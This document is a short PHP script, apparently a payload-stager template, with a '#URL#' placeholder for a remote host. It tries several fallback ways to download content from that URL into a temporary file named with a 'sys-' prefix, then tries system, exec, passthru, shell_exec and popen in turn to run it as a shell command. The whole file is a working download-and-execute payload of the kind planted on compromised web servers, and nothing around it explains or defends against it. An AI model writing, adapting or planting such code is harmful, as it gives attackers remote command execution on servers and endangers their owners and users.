<?php

$URL = '#URL#';
$payloadfile = tempnam(sys_get_temp_dir(), "sys-");

#cURL setup
if (extension_loaded('curl')) {
	$ch = curl_init();
	curl_setopt($ch,CURLOPT_URL,$URL); 
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); }


if ($payload = file_get_contents($URL)) {}
elseif ($payload = curl_exec($ch)) { curl_close($ch); }
elseif (copy($URL, $payloadfile)) {}
elseif ($in = fopen($URL, "rb")) {
	$out = fopen($payloadfile, "wb");
	while ($chunk = fread($in,8192)) {
		fwrite($out, $chunk, 8192);
	}
	fclose($in);
	fclose($out);
} else { die(); }

if ($payload) {
	$cmd = "$payload";
} elseif (file_exists($payloadfile)) {
	$cmd = "sh $payloadfile";
} else {
	die();
}

system($cmd, $err); 
if ($err == 0){ exit; }

exec($cmd, $out, $err);
if ($err == 2){ exit; }

passthru($cmd, $err);
if ($err == 2){ exit; }

if (shell_exec($cmd)){ exit; }

if (popen($cmd, "r")){ exit; }

#Remove payloadfile
?>
